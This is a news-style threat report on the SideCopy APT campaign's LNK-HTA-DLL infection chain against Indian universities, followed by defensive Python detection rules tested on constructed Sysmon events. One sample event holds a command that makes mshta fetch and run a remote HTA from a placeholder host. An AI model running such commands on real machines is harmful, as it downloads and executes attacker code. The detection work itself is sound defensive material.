The SideCopy APT group is running an ongoing campaign that currently targets academic institutions in India.
According to reports, the campaign has targeted university students since May of last year, using multi-stage infection chains built from LNK files, HTAs, and loader DLLs that pose as legitimate files.
Researchers had previously observed the group targeting South Asian countries, primarily the government and military sectors of Afghanistan and India. It has since shifted its focus to Indian universities, delivering malware such as Reverse RAT and Action RAT to gain full control of infected machines.
The investigation also examines the group's techniques, including its recent focus on university students and its possible overlap with the Transparent Tribe APT group.
SideCopy stages its payloads on a malicious domain used throughout the campaign.
Researchers found that the domain hosts a ZIP archive named "files.zip" with subdirectories labelled "economy," "it," and "survey." The "survey" directory contained files consistent with the techniques seen in the group's earlier campaigns.
The initial infection vector is most likely phishing emails that distribute the malicious ZIP archive hosted on the hijacked website. The archives contain LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk"; because Windows Explorer never displays the .lnk extension, the file appears to the victim as "IT Trends.docx."
When opened, the LNK runs a command that downloads and executes a malicious HTA file. The HTA in turn drops the next stage: a decoy document that is shown to the user, and a loader DLL. The decoy documents are themed around current events or academic topics relevant to the target population so that they appear credible.
The payload also checks which antivirus product is present (Avast, Kaspersky, and Bitdefender are among those it handles) and adapts its behaviour accordingly. Persistence is established by placing an LNK shortcut in the user's Startup folder, so the malware is relaunched at every logon; this is a well-known technique and one of the easiest locations for defenders to audit.
The attack method eventually results in malicious payloads such as Reverse RAT and Action RAT being deployed on the victim system, which then connects to a C2 server to initiate the threat actors’ malicious capabilities.
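The chain described above (shortcut with a double extension, cmd/powershell spawned by Explorer, mshta fetching a remote HTA, and a .lnk dropped into the Startup folder) is straightforward to hunt for in endpoint telemetry. The following Python is an added example written for this article, not code from the original report or from the researchers; it runs four detection rules over a handful of constructed Sysmon-style events (process creation and file creation). The host names, user name, file paths and the `example.invalid` URL in the sample events are hypothetical placeholders, not indicators from the campaign.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry in the shape of Sysmon EventID 1 (process create)
# and EventID 11 (file create). None of these values are real indicators.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # 0: a double-clicked shortcut makes Explorer spawn cmd.exe that calls mshta with a URL
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c mshta.exe http://example.invalid/it/lure.hta"},
    # 1: mshta itself fetching the HTA over the network
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://example.invalid/it/lure.hta"},
    # 2: the HTA drops a shortcut into the per-user Startup folder for persistence
    {"EventID": 11, "Image": r"C:\Windows\System32\mshta.exe",
     "TargetFilename": r"C:\Users\student\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # 3: the archive being extracted contains a document-looking .lnk
    {"EventID": 11, "Image": r"C:\Program Files\7-Zip\7zG.exe",
     "TargetFilename": r"C:\Users\student\Downloads\files\it\IT Trends.docx.lnk"},
    # 4: benign: mshta opening a local help file installed with an application
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    # 5: benign: a user saving an ordinary document
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "TargetFilename": r"C:\Users\student\Desktop\Report.docx"},
]

# Document-looking name followed by a trailing .lnk, e.g. "IT Trends.docx.lnk".
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|rtf|txt)\.lnk$", re.IGNORECASE)
# Both the per-user and all-users Startup folders end in this path fragment.
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
# Interpreters a shortcut typically launches to reach the next stage.
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")


def _basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_event(ev: Dict[str, object]) -> List[str]:
    """Rules for process-creation events; returns the names of the rules that fired."""
    hits: List[str] = []
    image = _basename(str(ev.get("Image", "")))
    parent = _basename(str(ev.get("ParentImage", "")))
    cmdline = str(ev.get("CommandLine", ""))
    # mshta pulling its HTA from the network: the LNK -> HTA download step.
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_url")
    # Explorer (i.e. a user opening a file/shortcut) spawning a script host that
    # invokes mshta or reaches out to a URL is how the LNK stage executes.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and (
        "mshta" in cmdline.lower() or REMOTE_URL.search(cmdline)
    ):
        hits.append("script_host_from_explorer")
    return hits


def check_file_event(ev: Dict[str, object]) -> List[str]:
    """Rules for file-creation events; returns the names of the rules that fired."""
    hits: List[str] = []
    target = str(ev.get("TargetFilename", ""))
    if DOUBLE_EXT_LNK.search(target):
        hits.append("double_extension_lnk")
    # Any shortcut written into a Startup folder is worth a look; a script host
    # or unknown process writing one is the persistence step described above.
    if STARTUP_DIR.search(target) and target.lower().endswith(".lnk"):
        hits.append("startup_folder_lnk")
    return hits


def analyze_events(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Run every rule over every event; returns (event index, rule name) pairs in order."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            rules = check_process_event(ev)
        elif ev.get("EventID") == 11:
            rules = check_file_event(ev)
        else:
            rules = []
        findings.extend((i, r) for r in rules)
    return findings


if __name__ == "__main__":
    for idx, rule in analyze_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The two benign events produce no findings: mshta launching a local .hta from Explorer is common for installed applications, so the rules key on the remote URL and on the Explorer-to-script-host-to-mshta chain rather than on mshta alone. In a real deployment the rules would be fed from the Sysmon or EDR event stream rather than a static list, and the Startup-folder rule should also be applied retrospectively by listing the contents of both Startup folders on each host.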
Experts urge Indian organisations, especially academic institutions, to deploy effective email filtering, train users to treat unexpected attachments and archives with caution, monitor at the network level, and restrict script interpreters and living-off-the-land binaries such as PowerShell, mshta.exe, and cmd.exe for users who do not need them (for example through AppLocker or WDAC rules); disabling cmd.exe outright is rarely practical, since legitimate administrative tasks and installers depend on it.